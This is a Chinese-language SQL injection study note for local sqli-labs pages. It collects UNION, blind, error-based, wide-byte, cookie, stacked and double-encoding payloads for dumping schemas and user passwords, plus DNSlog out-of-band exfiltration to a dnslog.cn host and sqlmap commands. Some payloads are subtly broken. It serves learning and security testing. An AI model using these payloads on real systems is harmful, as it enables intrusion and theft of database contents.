SQL注入定義:
SQL注入即是指web應用程序對用戶輸入數據的合法性沒有判斷或過濾不嚴,攻擊者可以在web應用程序中事先定義好的查詢語句的結尾上添加額外的SQL語句,在管理員不知情的情況下實現非法操作,以此來實現欺騙數據庫服務器執行非授權的任意查詢,從而進一步得到相應的數據信息。
注入類型:
當輸入參數為字符串時,稱為字符型。數字型與字符型注入最大的區別在於:數字型不需要單引號閉合,而字符串類型一般要使用單引號來閉合。
判斷數據庫類型:
判斷是否是 Mysql數據庫
' and exists(select*from information_schema.tables) --+
判斷是否是 access數據庫
' and exists(select*from msysobjects) --+
判斷是否是 Sqlserver數據庫
' and exists(select*from sysobjects) --+
判斷是否是Oracle數據庫
' and (select count(*) from dual)>0 --+
判斷注入點
數字型:id=2-1(在URL編碼中+代表空格,可能會造成混淆)
字符型:' 、')、 '))、 "、 ")、 "))
注釋符:--空格、--+、/**/、#
UNION注入:
union聯合查詢適用於有顯示列的注入,可以通過order by來判斷當前表的列數
因為頁面只顯示一行數據,所以union注入需要將前面的條件否定(把參數變為負)
union注入可能需要用到的一些信息:
version() :數據庫的版本
database() :當前所在的數據庫
@@basedir : 數據庫的安裝目錄
@@datadir : 數據庫文件的存放目錄
user() : 數據庫的用戶
current_user() : 當前用戶名
system_user() : 系統用戶名
session_user() :連接到數據庫的用戶名
MYSQL5.0以下沒有information_schema這個系統表,無法列表名等,只能暴力跑表名。,5.0以下是多用戶單操作,5.0以上是多用戶多操做。
獲得所有的數據庫
?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+
獲得所有的表
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables --+
獲得指定數據庫所有的表
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
獲得所有的列
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns --+
獲得指定數據庫指定表的列
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
獲取具體字段
?id=-1' union select 1,group_concat(id,'--',username,'--',password),3 from users --+
獲取當前數據庫中指定表的指定字段的值(只能是database()所在的數據庫內的數據,因為處於當前數據庫下的話不能查詢其他數據庫內的數據)
?id=-1' union select 1,group_concat(password),3 from users --+
盲注:
**判斷是否存在延時注入:**
http://127.0.0.1/mysql/Less-1/?id=1' and sleep(5) --+
http://127.0.0.1/mysql/Less-1/?id=1' and benchmark(100000000,md5(1)) --+
**判斷當前數據庫**
布爾盲注
數據庫database()的長度大於10
'and (length(database()))>10 --+
數據庫database()的第一個字符ascii值大於100
' and ascii(substr(database(),1,1))>100 --+
時間盲注
數據庫database()的長度大於10
' and if((length(database())>10),1,sleep(5)) --+
數據庫的第一個字符的ascii值小於100
' and if((ascii(substring(database(),1,1)))<100,1,sleep(5)) --+
**判斷當前數據庫中的表**
布爾盲注
判斷當前數據庫中的表的個數是否大於5
' and (select count(table_name) from information_schema.tables where table_schema=database())>5 --+
判斷第一個表的長度
' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6 --+
判斷第一個表的第一個字符的ascii值
' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100 --+
時間盲注
判斷當前數據庫中的表的個數是否大於5
' and if((select count(table_name) from information_schema.tables where table_schema=database())>5,1,sleep(5)) --+
判斷第一個表的長度
' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6,1,sleep(5)) --+
判斷第一個表的第一個字符的ascii值
' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,1,sleep(5)) --+
**判斷表中的字段**
布爾盲注
如果已經證實了存在users表,那么猜測是否存在username字段
' and exists(select username from users) --+
判斷表中字段的個數
' and (select count(column_name) from information_schema.columns where table_name='users')>5 --+
判斷第一個字段的長度
' and length((select column_name from information_schema.columns where table_name='users' limit 0,1))>5 --+
判斷第一個字段第一個字符的ascii值
' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100 --+
時間盲注
如果已經證實了存在users表,那么猜測是否存在username字段
' and if(exists(select username from users),1,sleep(5)) --+
判斷表中字段的個數
' and if((select count(column_name) from information_schema.columns where table_name='users')>5,1,sleep(5)) --+
判斷第一個字段的長度
' and if(length((select column_name from information_schema.columns where table_name='users' limit 0,1))>5,1,sleep(5)) --+
判斷第一個字段第一個字符的ascii值
' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100,1,sleep(5)) --+
**判斷字段中的數據**
布爾盲注
判斷第一個數據的長度
' and length(select id from users limit 0,1)>5 --+
判斷第一個數據第一個字符的ascii值
' and ascii(substr((select id from users limit 0,1),1,1))>100 --+
時間盲注
判斷第一個數據的長度
' and if(length(select id from users limit 0,1)>5,1,sleep5()) --+
判斷第一個數據第一個字符的ascii值
' and if(ascii(substr((select id from users limit 0,1),1,1))>100,1,sleep(5)) --+
使用正則表達式進行盲注
判斷第一個表名的第一個字符是否是a-z中的字符
http://127.0.0.1/mysql/Less-2/?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" AND table_name REGEXP '[1]' LIMIT 0,1) --+
然后依據頁面回顯判斷是否正確,最后得到第一個字符為e
然后判斷第一個表名的第二個字符是否是a-z中的字符
http://127.0.0.1/mysql/Less-2/?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" AND table_name REGEXP '^e[a-z]') --+
依次猜第三個第四個字符。。。
DNS外帶注入
在實際測試一些網站的安全性問題的時候,有些測試命令執行后是無回顯的,可以寫腳本來進行盲注,但有些網站會封禁掉ip地址,這樣可以通過設置ip代理池解決,但是遇到盲注往往效率很低,所以產生了DNSlog注入。
MySQL通過DNSlog盲注需要用到load_file()函數,該函數不僅能加載本地文件,同時也能對URL發起請求。因為需要使用load_file()函數,所以需要root權限,並且secure_file_priv需要為空
Payload:
(SELECT LOAD_FILE(CONCAT('\\\\',(要查詢的語句),'.xx.xx.xx\\abc')))
執行的語句:
刷新dns平台:
因為Linux沒有UNC路徑這個東西,所以當MySQL處於Linux系統中的時候,是不能使用這種方式外帶數據的 ,這也就解釋了為什么CONCAT()函數拼接了4個\了,因為轉義的原因,4個就變\成了2個\,目的就是利用UNC路徑。
首先獲取一個dnslog地址,然后拼接到sql語句中。
當數據發送后,dnsLog被記錄下來。
也可以在命令之中用HEX編碼。Hex編碼的目的就是減少干擾,因為很多事數據庫字段的值可能是有特殊符號的,這些特殊符號拼接在域名里無法做dns查詢,因為域名是有一定的規范,有些特殊符號不能帶入。
http://127.0.0.1/mysql/Less-1/?id=1' and (select load_file(concat('\\',hex((select table_name from information_schema.tables where table_schema=database() limit 1)),'.x14y65.dnslog.cn\abc')))%23
解碼后得到第一個表名
當然通過DNSlog也可以盲打xss
payload:
<img src=http://rep964.dnslog.cn>
DNSLog平台收到的DNS查詢,即可證明存在XSS
報錯注入:
floor報錯原理
需要用到count(),floor(rand()2),group by這些方法,來看一下都有什么用。
floor作用是向下取整
rand()表示0-1隨機數,rand()*2就相當於0-2的隨機數,每次運算結果都不同
先查詢users表中數據
floor(rand(0)*2) 每次的結果是隨機的(users表中有13條數據)
而當提供了參數0后,floor(rand(0)*2)的每次結果都相同(users表中有13條數據)
count(*)表示字段數
group by表示以誰來排序,比如
下面這個依照group by生成的相當於一個新表,先掃描password字段,如果這個字段不存在就插入,然后把count(*)置為1。像password為admin2有兩個用戶,第二個用戶插入的時候已經有admin2這個字段了,也就不會重新生成一個新的admin2字段,而是在count(*)的基礎上加1,直到依照password掃描完整個表,就形成了以password排序的新表了。
關鍵點:
1.group by后面的主鍵是不能重復的,這是floor報錯的關鍵點
2.在執行group by語句時,group by 后面的字段會被運算兩次
第一次運算:group by拿到字段后在表內對比,如果后面字段已經存在,直接插入,不進行二次運算
第二次運算:如果order by后面的字段不存在,則進行二次運算,由於ran()的隨機性,第二次的運算和第一次可能不一樣,這時候插入可能會導致錯誤的產生。
由於 select floor(rand(0)*2) from users每次結果都相同比較好比較,所以就拿這個查詢語句來做演示
select count(*),(concat(floor(rand(0)*2),'@',(select version())))x from users group by x
因為users有13個字段,(floor(rand(0)*2)由上面的圖也已經確定了為0,1,1,0,1,1,0,0,1,1,1,0,1。
查詢的第一項:
floor(rand(0)*2)=0,結果為0@5.7.26,因為表中還沒有這個值,所以會直接插入,count(*)置為1
但是依照上面第2條關鍵點,在插入前會進行兩次計算第二次運算的時候(floor(rand(0)*2)已經變為1了,所以這張表會先變為
x count(*)
1@5.7.26 1
查詢的第二項:
因為第一個插入進行了兩次運算,所以floor(rand(0)*2)=1,結果就為1@5.7.26,因為表中x已經有了 1@5.7.26這個字段,依照上面的第2個關鍵點,直接插入,不進行第二次運算。所以這張表會再變為
x count(*)
1@5.7.26 2
查詢的第三項:
前面兩次進行了三次運算,這次floor(rand(0)*2)=0,結果為0@5.7.26,表中沒有這個字段,會直接插入,count(*)置為1
但是依照上面第2條關鍵點,在插入前會進行兩次計算第二次運算的時候(floor(rand(0)*2)已經變為1,相應的字段就變為了1@5.7.26。這個時候問題就來了:
表中已經有以1@5.7.26為主鍵的數據了,插入失敗,然后就報錯了。
payload:
select count(*),(concat(floor(rand(0)*2),'@',(select version())))x from users group by x
跟前面的查詢語句也是一個道理,只是floor(rand()*2)沒有floor(rand(0)*2)穩定
ExtractValue報錯原理
extractvalue()是對XML文檔進行查詢的函數
語法為:extractvalue(目標xml文檔,xml路徑)
第二個參數 xml中的位置是可操作的地方,xml文檔中查找字符位置是用 /aa/bb/cc/dd/a這種路徑或者純英文純數字格式,但是寫入其他格式就會報錯,並且會返回寫入的非法格式內容,
所以可以把想要得到的數據寫到xml路徑中從而返回該數據。
可以看到只要路徑滿足條件無論結果是否有值都不會報錯,而這里version()已經報錯了,說明路徑也不能存在點號。
可以以不是xml格式的語法的內容開頭,然后報錯,但是會顯示無法識別的內容是什么,這樣就達到了目的。
extractvalue()能查詢字符串的最大長度為32,就是說如果我們想要的結果超過32,就需要用substring()函數截取,一次查看32位:
payload:
select username from users where id=1 and (extractvalue('anything',concat('#',substring(hex((select database())),1,32)))
UpdateXml報錯原理
updatexml()函數跟extractvalue()類似,是XML文檔進行查詢的函數。
語法為:updatexml(目標xml文檔,xml路徑,更新的內容)
報錯方式也類似,滿足/aa/bb/cc,全數字,全英文
payload:
select username from users where id=1 and (updatexml('anything',concat('+',(select database())),'anything'));
利用:
就用爆當前數據庫做演示,其他的語句大同小異
floor報錯注入:
' and (select 1 from (select count(),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()2))name from information_schema.tables group by name)b) --+
ExtractValue報錯注入:
' and extractvalue(1, concat(0x7e, (select database()),0x7e))--+
能查詢字符串的最大長度為32,如果長度大於32位分段讀取
' and (extractvalue('anything',concat('#',substring(hex((select database())),1,32))))--+
UpdateXml報錯注入:
' and 1=(updatexml(1,concat(0x3a,(select database()),0x3a),1)) --+
寬字節注入:
Mysql在使用GBK編碼時,會認為兩個字符為一個漢字。寬字節注入就是發生在PHP向Mysql請求時字符集使用了GBK編碼。
關於寬字節注入的幾個函數:
addslashes() :預定義字符之前添加反斜杠 \ 。預定義字符: 單引號 ' 、雙引號 " 、反斜杠 \ 、NULL。但是這個函數有一個特點就是雖然會添加反斜杠 \ 進行轉義,但是 \ 並不會插入到數據庫中。這個和魔術引號的作用完全相同。所以,如果魔術引號打開了,就不要使用 addslashes() 函數了。
mysql_real_escape_string() :這個函數用來轉義sql語句中的特殊符號x00 、\n 、\r 、\ 、‘ 、“ 、x1a。
magic_quotes_gpc(魔術引號):當打開時,所有的單引號’ 、雙引號" 、反斜杠\ 和 NULL 字符都會被自動加上一個反斜線來進行轉義,
這三個函數都會把'轉義,會轉義成 \'。
當對用戶輸入的id用 addslashes() 函數進行了處理,並執行id=1'--+時,MySQL實際執行的語句是id='1\'--+
很明顯這是沒有注入成功的,單引號並沒有閉合。
這里需要利用到MySQL的一個特性。MySQL在使用GBK編碼的時候,會認為兩個字符是一個漢字,前提是前一個字符的 ASCII 值大於128,才會認為是漢字。
當提交的是 id=1%df'--+時,MySQL執行的語句就會變成id='1%df%5c%27--+ ,MySQL正是把%df%5c當成了漢字 運 來處理,所以最后 %27 也就是單引號逃脫了出來,這樣就發生了報錯。
寬字節修復:
1.使用 mysql_real_escape_string()
在執行 sql 注入之前必須使用 mysql_set_charset 指定 php 連接 mysql 的字符集,單獨調用 mysql_real_escape_string 是無法防御的
2.將 character_set_client 設置為binary(二進制)。
cookie注入
先訪問帶參數的網址127.0.0.1/product_list.asp?smallclass=148
去掉參數:127.0.0.1/product_list.asp?
查看頁面顯示是否正常,如果不正常,說明參數在數據傳遞中是直接起作用的
f12輸入:alert(document.cookie="smallclass="+escape("148"));
會出現一個彈窗。
127.0.0.1/product_list.asp?頁面刷新后網站顯示正常。
接下來:
1.輸入:javascript:alert(document.cookie="smallclass="+escape("148 and 1=1"));
彈窗,然后輸入127.0.0.1product_list.asp頁面正常。
2.輸入javascript:alert(document.cookie="smallclass="+escape("148 and 1=2"));
彈窗,再輸入127.0.0.1/product_list.asp頁面不正常
現在可以確定該網站存在注入漏洞,並且可以通過Cookie進行注入。
然后換語句猜解字段數:
javascript:alert(document.cookie="smallclass="+escape("148 order by 12"));
或者使用sqlmap后加入參數 --cookie "smallclass=148" --table --level 2
堆疊注入:
堆疊注入(Stacked injections)就是將多條sql語句以;分隔,並同時執行多條任意語句。
查詢users表並創建一個跟users類似的表
select * from users where id=1;create table test123 like users;
看是否創建成功:
二次編碼注入:
漏洞產生原因:
后端程序的編碼函數,如urldecode(),rawurldecode()等,與PHP本身處理編碼時,放在了一個尷尬的使用位置,與PHP自身編碼配合失誤,其本質就是將%2527先解碼成%27再解碼成單引號
實例:
如果提交:http://127.0.0.1/sql.php?id=1%27
就可以繞過對'的轉義,從而造成了sql注入攻擊
在測試時,如果發現了頁面可能存在二次編碼注入漏洞,可在注入點后加上%2527然后用sqlmap跑
python3 sqlmap.py -u "http://127.0.0.1/erci.php?id=1%27*"
或者使用自帶的腳本chardoubleencode.py進行注入
還有幾個沒總結到,慢慢補吧。。。
a-z ↩︎